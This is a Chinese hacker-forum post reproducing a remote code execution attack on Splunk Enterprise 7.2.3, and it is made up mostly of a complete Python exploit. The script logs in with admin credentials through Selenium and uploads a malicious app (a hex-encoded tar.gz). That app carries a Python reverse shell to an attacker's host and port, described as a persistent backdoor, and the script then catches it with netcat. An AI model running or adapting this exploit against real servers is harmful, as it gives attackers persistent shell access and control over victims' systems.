Splunk Enterprise 7.2.3代码执行

言吾
9681言吾首席执行运营官
思路技巧 2019-04-20 20:05:41
9681 思路技巧 2019-04-20 20:05:41
黑客话题: 7.2.3代码执行
漏洞介绍
Splunk Enterprise 存在代码执行(持久后门)

漏洞影响
Splunk Enterprise 7.2.3

漏洞复现
环境搭建
官网下载Sqlunk Splunk Enterprise 7.2.3
https://www.splunk.com/en_us/download/splunk-enterprise.html
搭建参考:https://www.cnblogs.com/linux130/p/5571350.html
所需插件:https://github.com/mozilla/geckodriver/releases
选择相对应的平台
准备好之后就开始我们的复现踩坑之路

踩坑
本部分内容设定了隐藏,需要回复后才能看到

poc.py <targeturl> <username> <password> <lhost> <lport>

这里lhost lport为反弹shell的ip和端口
在运行poc时需要firefox和selenium为最新版本 不然会爆出错误
执行poc后 会自行模拟浏览器进入输入密码进入splunk后台

图片:4.png


然后上传app并进行反弹shell

图片:5.png


在shell反弹时需要耐心等待一会大概1-2分钟才会有回显
在kali下更新firefox参考:https://blog.csdn.net/henuyh/article/details/81350170
不同环境搭建出现的问题不同,多多搜索并解决出现的问题。

复现录屏

图片:6.gif


poc
    #!/usr/bin/python
    # Exploit Title: Splunk Enterprise 7.2.3 Custom App RCE (persistent backdoor)
    # Date: January 23, 2019
    # Exploit Author: Lee Mazzoleni
    # Vendor Homepage: https://www.splunk.com/
    # Software Link: https://www.splunk.com/en_us/download/splunk-enterprise.html
    # Version: 7.2.3
    # Tested on: kali 4.18.0-kali2-amd64
    # CVE : n/a
    
    from selenium import webdriver
    from selenium.webdriver.common.keys import Keys
    from time import sleep
    from sys import stdout,argv
    from os import getcwd,path,system
    from subprocess import Popen
    
    # Download and unpack the correct version for your OS from here: github.com/mozilla/geckodriver/releases
    gecko_driver_path = '/root/Desktop/SplunkSploit/Gecko/geckodriver'
    
    def checkLogin(url):
        if '/login' not in url and '/logout' not in url:
            print 'Login successful!'
        else:
            print 'Login failed! Aborting...'
            exit()
    
    def checkUrl(url):
        if '_upload' not in url:
            print '[-] Navigation error, aborting...'
            exit()
    
    def exploit(splunk_target_url, splunk_admin_user, splunk_admin_pass, lport):
        print '[+] Starting bot ...'
        profile = webdriver.FirefoxProfile()
        profile.accept_untrusted_certs = True
        driver = webdriver.Firefox(firefox_profile=profile, executable_path=gecko_driver_path)
    
        print '[*] Loading the target page ...'
        driver.get(splunk_target_url)
        sleep(1)
    
        stdout.write('[*] Attempting to log in with the provided credentials ... ')
        username_field = driver.find_element_by_name("username")
        username_field.clear()
        username_field.send_keys(splunk_admin_user)
        sleep(1)
    
        pw_field = driver.find_element_by_name("password")
        pw_field.clear()
        pw_field.send_keys(splunk_admin_pass)
        pw_field.send_keys(Keys.RETURN)
        sleep(3)
    
        current_url = driver.current_url
        checkLogin(current_url)
    
        url = driver.current_url.split('/')
        upload_url = url[0] + '//' + str(url[2]) + '/' + url[3] + '/manager/appinstall/_upload'
        print '[*] Navigating to the uploads page ({}) ...'.format(upload_url)
        driver.get(upload_url)
        sleep(1)
    
        current_url = driver.current_url
        checkUrl(current_url)
    
        form = driver.find_element_by_tag_name("form")
        input = form.find_element_by_id("appfile")
        input.send_keys(getcwd()+'/'+'splunk-shell.tar.gz')
        force_update = driver.find_element_by_id("force")
        force_update.click()
        submit_button = driver.find_element_by_class_name("splButton-primary")
        submit_button.click()
    
        print '[*] Your persistent shell has been successfully uploaded!'
        driver.quit()
        print '[+] Preparing to catch shell ... (this may take up to 1 minute)'
        system('nc -lvp {}'.format(lport))
    
    def generatePayload(lhost, lport):
        # this hex decodes into the evil splunk app (tar.gz file) that we will be uploading as the payload
        # after the app is written to disk, a reverse shell is created and added to the app (it uses the user-supplied lhost and lport parameters to create the shell)
        # the app configuration sets it to be enabled upon installation (restarting splunk / manually enabling it is not required.)
        # this is a PERSISTENT backdoor, there is no need to re-upload multiple times... the backdoor will reconnect every 10-20 seconds
        print '[*] Creating Splunk App...'
        shell = '1f8b080030e9485c0003ed5b6b6fdb3614cd67fd0a221e9036ab65bd95b87b206b332c5830144bda0e705d8396689b8b446aa214271bf6df7749d9895f8993d451da95e7432c91145f87e7f25e89115952b2b3a6189124696d3d0e2c40e8fbea17b0f8abae6dd7731c3b702c1fd26dc70ead2de43f527fe6508a02e7086de59c17b7955b97ff8542ccf29ff0083fc22a50fc2ff37e0bffaee36bfe6bc10afe7196991167838db521090e6ee11fb85fe0df0bc2700b591bebc12df8caf9ef50061390245d037e0a82be4784e17e4262c3e894b46b50d13ba782420a64d99098e09245239277e13ac3d1191e92ae0109d1596fc0f35e99c5508d50859f7a6c1aeb31a7ff3e658fe103dc63fff71cdf95fb7fe885dafed78139fe535260902fdef022b8bfffe7867affaf07abf98fc900974961ca844f6f4312ec79de8dfcbbaebbc07fe078b6deffeb40a76be0282242eed839c1316aa30eda45dd17689c53f00726b772b3cf79265a82b038c53469750d7291f1bc80e7c4a528486af0312339dc32dee7f1a561341a0df4eee8f0fdc9e9c1e9e1491b9173c220334f71824a417281c48897498cfa04499703151c45d00768558c704e62744ec958b92502dabfbeb963979f7a6abf08acd6bf0a0436a4fef5fe7fe8840bfaf743dbd2faaf031d88f65a931860fadb13bccc23d2535ebd28d3ae710e6aa59c81e042d3315d23e57141531512f89ebfef04e19e65865610ec419c6f8158676b55a2bd531da1e9eebbaee35475dc51e68b66686d3b7bbe6beefb76e8dad77d95a1ceba07617c96e9d976b01f5c3f781d0e4dcd1f8e53caee5a99ebb87bd7954de2a9d6523875e7ce795635aa3bf33fa77fe803d865686ab30ee0fdfd3fcf0eb5ff5f0b6ee05f6a96461b5a06f7e7dff78240f35f076ee71f12121ac125676624c403db58e3ffbb8ee7ccf32fff3a7affaf03ad5df46a84d910bcef11b8e15986123ee408763462222448a1d247840e47456b4ce36284605f4297e021209ac266f5026181c6b07ae4af2c9b612803aebcbc5625d06ecb30a1e66359f13f060254f5b591e766172f914a5275b7d19e05292aa10f9be130e7258bdba8cc9367d33549d3614b9c8173318d525bd51aeec98ef7fa093c66666cf81c428d664e3288279085acaacedea7543aa483a54aff350c98c1d3326708366739e4c9f328e3824add5036447ca0b2b64f549de80d1fc3f4c6db73532d27a96a73923d335daddd5df50ba5d05b16f13425ac2266c093848f651b096544a067630ab3bf1353a80a5fee2019b491bca0443c979c40c03556cfa996659b55f568f2401b3553fe779332595b13e6263aab26ee2a7f92d58708e1eca5ac60a983aadfaa1be391f4d30a72515c65a2262a670720207fccd1ce352fb37d46742057da4e0ca33b83d589e627b01ac5425333839a215b72bdbd96ecacaab7225d552957d2f62ceb22ca61ca25f9a8c831131904aaac585e5d0f6e1056d95d1a8461ca214a2d1e1d063359d1a5cc0218577f56b3a316f53c3b8f4fcec6d8b9d2795dec5cd9804db333b1858e3b357c29ce8794350b9eb5edabc4ca3c06bebcaf8c8e514a7e465448614ff4a9b4cd30c405139323bfe55525956cabb6e40338fe13763e84133a648a6fc5941ca909c41a74b0aa2a048d517665405e4c3788b93eb4617a187909a39bd8fd5f207823f9fb1c2e21401ad913a316f184e7ed46e862df9f98e7993e4ef60618eb53ef90ff6f2c7cff1d8a47f800f480f7fff293b0f6ff6bc032fff2ed2e5c6cb08d75efff2dcb5e8cffbd50bfffab05dabc7eddb851ffa6bdb1361ea0ffc0d1e77f6a81d6ffd78d39fd4fe39f0db7f100ff2fb0b5ff570b56f2af3ef56fee0ce83afb6f078bf6df0f1cfdfeb7163420ec7e37f9b6587d596c74a6673cba46e3e7a3c3e3d707c7470727cd540c698cbe4729fc3d3841ead6681cfe71fafbc1abd3e65f2a6ffa64e7e3876e77f743b7fd417cfbecc7ef20f387cec77677f7795bef379f1756ea7fc327c0a5c66f3bffe1848be7bf7dc70db4feebc0acfe6dd3322da3317d912b5ff8c955408765ae3e01a2014d88612c1f198fa9a8ce8cdf7080048a387b83fd20d8b78965937ee0c5b11b39837e1085180ff62c2f8afca88ffbcefeaa63e7039c086224b84f126963e4526d42e7b429d90056ea9fb2ac2c36e700acddffc3a5f39ff080d67f1d58a5ff57ea10a6409821b512d4770c81d30cd4288f079a205211e5342bdaad96a9fe6b40ad1f33bbec1a535b004ab5c01e14243fc709b22da3b209c565a6245d322ddfcf0137e83f2617646306609dfe9d65fddbdaffaf074bfa37670dc054f56a41ac3003102ba87b8814463c256fe4d10f04f2fee6e4cdf1dbdf7eedbdfea9551568c57da311f124bea588cc96c58a111e93aae0aa625536147ceaa9d3d0d0d0d0d0d0d0d0d0d0d0d0d0d0d0d0d0f8ecf11f88a26c5b00500000'
        bytes = shell.decode('hex')
        f = open('splunk-shell.tar.gz','wb')
        f.write(bytes)
        f.close()
        print '\t==&gt; Adding reverse shell (to {}:{}) to the app...'.format(lhost,lport)
        f = open('shell.py','w')
        f.write('import sys,socket,os,pty\n')
        f.write('ip="{}"\n'.format(lhost))
        f.write('port="{}"\n'.format(lport))
        f.write('s=socket.socket()\n')
        f.write('s.connect((ip,int(port)))\n')
        f.write('[os.dup2(s.fileno(),fd) for fd in (0,1,2)]\n')
        f.write('pty.spawn("/bin/sh")\n')
        f.close()
        decompress_cmd = 'tar zxvf splunk-shell.tar.gz &&gt;/dev/null; rm splunk-shell.tar.gz'
        p = Popen(decompress_cmd, shell=True, executable='/bin/bash')
        p.wait()
        move_cmd = 'mv shell.py splunk-shell/bin/'
        p = Popen(move_cmd, shell=True, executable='/bin/bash')
        p.wait()
        compress_cmd = 'tar zcvf splunk-shell.tar.gz splunk-shell/ &&gt;/dev/null; rm -r splunk-shell/'
        p = Popen(compress_cmd, shell=True, executable='/bin/bash')
        p.wait()
        if path.isfile('splunk-shell.tar.gz'):
            print '\t==&gt; Payload Ready! (splunk-shell.tar.gz)'
    
    def showUsage():
        print '\n\tScript Usage: {} &lt;targetUrl&gt; &lt;username&gt; &lt;password&gt; &lt;lhost&gt; &lt;lport&gt;'.format(argv[0])
            print '\tExample: {} https://192.168.4.16:8000 admin changeme 192.168.4.5 4444\n'.format(argv[0])
    
    if len(argv) != 6:
        showUsage()
        exit()
    
    if not path.isfile(gecko_driver_path):
        print '\n\t[!] This program requires geckodriver, download the corresponding version for your OS from the following link:'
        print '\t\t==&gt; https://github.com/mozilla/geckodriver/releases'
        print '\n\t[!] Extract the geckodriver binary, then add its full path to line 20 of this script.'
        print '\t\t==&gt; gecko_driver_path = "/tmp/geckodriver"\n'
        exit()
    
    splunk_target_url = argv[1]
    splunk_admin_user = argv[2]
    splunk_admin_pass = argv[3]
    lhost = argv[4]
    lport = argv[5]
    generatePayload(lhost, lport)
    exploit(splunk_target_url, splunk_admin_user, splunk_admin_pass, lport)
    本文原创作者:蚁安网-无心
    本文标题:Splunk Enterprise 7.2.3代码执行
    本文作者:言吾
    本文来自:蚁安黑客官网
    转载请注明本文链接:http://bbs.mayidui.net/t3017-1.html
    Admin559
    沙发Admin559黑客小白 05-02 09:49
    谢谢大佬分享
    游客
    登录黑客论坛后才可以回帖,黑客登录 或者 注册黑客
    weixin
    蚁安黑客

    找黑客工具、找黑客教程、找黑客朋友,你想不到的黑客技术这儿都有!

    微信号:baiyiwangan